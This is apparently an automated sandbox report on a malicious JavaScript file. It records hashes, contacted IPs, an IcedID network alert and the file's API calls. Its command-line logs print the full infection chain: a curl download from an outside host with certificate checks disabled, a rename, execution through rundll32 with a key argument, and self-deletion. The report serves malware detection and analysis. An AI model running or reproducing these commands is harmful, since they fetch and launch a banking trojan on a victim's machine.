Summary | ZeroBOX

Document_Scan_480.js

UPX OS Processor Check PE64 PE File DLL
Category Machine Started Completed
FILE s1_win7_x6402 Aug. 31, 2023, 9:49 a.m. Aug. 31, 2023, 9:51 a.m.
Size 30.1KB
Type ASCII text
MD5 e22cc458efd3971cb286c74abef7bd5a
SHA256 3bac40543dde306ddbb28ffb748fc3924cc1c25be2d19973c1f8ed20dabb9c74
CRC32 D24D3B25
ssdeep 768:kP1pljT83ppI1EHZ7MxClGmk+sjMnnlD8VPG0:elf8zXHJ1qVPG0
Yara None matched

IP Address Status Action
164.124.101.2 Active Moloch
172.67.179.217 Active Moloch
184.168.117.217 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49175 -> 172.67.179.217:80 2032086 ET MALWARE Win32/IcedID Request Cookie A Network Trojan was detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.2
192.168.56.102:49169
184.168.117.217:443
C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority CN=moashraya.com f5:4f:f0:43:5d:87:29:b9:67:28:34:e9:f9:c2:a3:5d:38:79:d1:55

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: curl
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\aut.lvelit.i" --ssl-no-revoke --insecure --location
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

bind

ip_address: 127.0.0.1
socket: 144
port: 0
1 0 0

listen

socket: 144
backlog: 1
1 0 0

accept

ip_address:
socket: 144
port: 0
1 152 0
suspicious_features GET method with no useragent header suspicious_request GET http://oopscokir.com/
request GET http://oopscokir.com/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefa1b7000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\aut.l.bat
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\aut.l.bat"
cmdline "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\aut.l.bat"
cmdline "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\aut.lvelit.i" "aut.l"
cmdline "C:\Windows\System32\cmd.exe" /c echo curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\aut.lvelit.i" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\aut.l.bat"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_480.js"
cmdline cmd.exe /c echo curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\aut.lvelit.i" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\aut.l.bat"
cmdline cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\aut.lvelit.i" "aut.l"
cmdline cmd.exe /c "C:\Users\test22\AppData\Local\Temp\aut.l.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\aut.l.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_480.js"
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_480.js"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c echo curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\aut.lvelit.i" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\aut.l.bat"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c "C:\Users\test22\AppData\Local\Temp\aut.l.bat"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c ren "C:\Users\test22\AppData\Local\Temp\aut.lvelit.i" "aut.l"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32
parameters: "C:\Users\test22\AppData\Local\Temp\aut.l", scab /k arabika752
filepath: rundll32
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\aut.l.bat"
filepath: cmd.exe
1 1 0
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\aut.l.bat"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_480.js"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\aut.l.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_480.js"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\aut.l.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\aut.lvelit.i" "aut.l"
parent_process wscript.exe martian_process rundll32 "C:\Users\test22\AppData\Local\Temp\aut.l", scab /k arabika752
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c echo curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\aut.lvelit.i" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\aut.l.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\aut.l.bat"
parent_process wscript.exe martian_process cmd.exe /c echo curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\aut.lvelit.i" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\aut.l.bat"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_480.js"
parent_process wscript.exe martian_process cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\aut.lvelit.i" "aut.l"
parent_process wscript.exe martian_process "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\aut.l", scab /k arabika752
parent_process wscript.exe martian_process cmd.exe /c "C:\Users\test22\AppData\Local\Temp\aut.l.bat"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\aut.l.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_480.js"
file C:\Windows\System32\cmd.exe
file C:\Windows\System32\rundll32.exe